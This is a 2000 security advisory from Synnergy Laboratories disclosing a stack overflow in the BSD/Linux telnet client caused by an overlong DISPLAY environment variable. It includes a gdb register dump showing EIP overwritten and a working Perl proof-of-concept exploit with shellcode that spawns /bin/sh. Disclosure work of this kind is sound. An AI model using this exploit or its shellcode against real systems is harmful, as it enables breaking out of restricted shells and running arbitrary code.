Synnergy Laboratories Advisory SLA-2000-14
NAME
BSD/Linux telnet client overflow
AFFECTED
Linux
Debian
Redhat
Mandrake
Slackware
[ possibly others ]
BSD
FreeBSD
[ possible others ]
SYNOPSIS
Synnergy Labs has found a bug in the telnet client that causes a stack
overflow by filling the DISPLAY environment variable with approx 1000-3000
bytes, allowing possible code execution to take place.
DESCRIPTION
Synnergy has recently discovered a trivial bug in the BSD/Linux telnet client,
that overwrites the EIP register on the stack. From a security point of view
this bug would not cause much of a problem in general since the telnet client
does not run with elevated priviledges. Though, there are *possible* scenarios
where this bug may present itself. Such a case was provided by the FreeBSD
security admin, who said:
"a non-shell service providing environment, where users are not intended to
be able to execute arbitrary code, but can set environmental variables
(i.e., a telnet-in old-style BBS with a telnet-out function). My suspicion is
that if you have an environment like this, many base system tools suffer from
this limitation "
Other possible scenarious would be, a restricted shell in a role playing game,
or message board system within the shell. Both these situations allow the user
to manually edit the environment variables, thus giving reason behind this advisory.
Since the DISPLAY environment variable is passed through telnetd you could exploit
an account without a password that runs telnet.
The bug occurs by setting the DISPLAY environment variable to around 1000 bytes,
though this may vary from distribution to distribution. Redhat segfaulted around
2000.
Example:
[ dethy@syn ] $ export DISPLAY=`perl -e 'print "A"x1000'`
[ dethy@syn ] $ telnet localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Segmentation fault (core dumped)
Now loading up gdb, we see the following:
#0 0x41414141 in ?? ()
(gdb) info all-registers
eax 0xbfbfd672 -1077946766
ecx 0x3e 62
edx 0x80574d0 134575312
ebx 0xf0 240
esp 0xbfbfd6e8 0xbfbfd6e8
ebp 0x41414141 0x41414141
esi 0xc 12
edi 0xf 15
eip 0x41414141 0x41414141
eflags 0x10246 66118
..a successful hit! EIP and EBP were overwritten, thus arbitary code could
be spawned, but a shell is good enough for us. :)
Below is a proof of concept exploit that demonstrates the overflow by spawning
a shell through telnet, once the environment variable has been set.
#!/usr/bin/perl
# Generic exploit program in perl, which clears the environment to take
# away the need for offset guessing.
# Dvorak (@synnergy.net // @hit2000.org) 1999.
$egg = "\x90" x 1500;
$egg .= "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76";
$egg .= "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b";
$egg .= "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff";
$egg .= "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff";
$egg .= "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02";
$egg .= "\x02\x02\x02/bin/sh.-c.sh";
foreach $key (keys %ENV) {
delete $ENV{$key};
}
# change the size of $buf if you need to.
$buf="";
for ($i = 0; $i < 256; $i++) {
$buf .= "\x01\xda\xbf\xbf";
}
# Put here your use for $buf, the string to exploit the vulnerable program with
$ENV{"DISPLAY"} = $buf;
$ENV{"egg"} = $egg;
system("/usr/bin/telnet localhost");
printf("Exploit done\n");
SOLUTION
I have contacted the FreeBSD security admin, and he is working on his own advisory,
I would like to thank Rob Watson for his promptness.
Other distributions should come out with their advisories soon.
AUTHOR
Advisory : dethy @ synnergy.net
Discovery: hf @ synnergy.net
Exploit : dvorak @ synnergy.net
DISCLAIMER
Synnergy Laboratories may not be held liable for the use or potential
effects of these programs or advisories, nor the content contained
within. Use them at your own risk.
COPYRIGHT
Synnergy Laboratories - www.synnergy.net (c) 1998-2000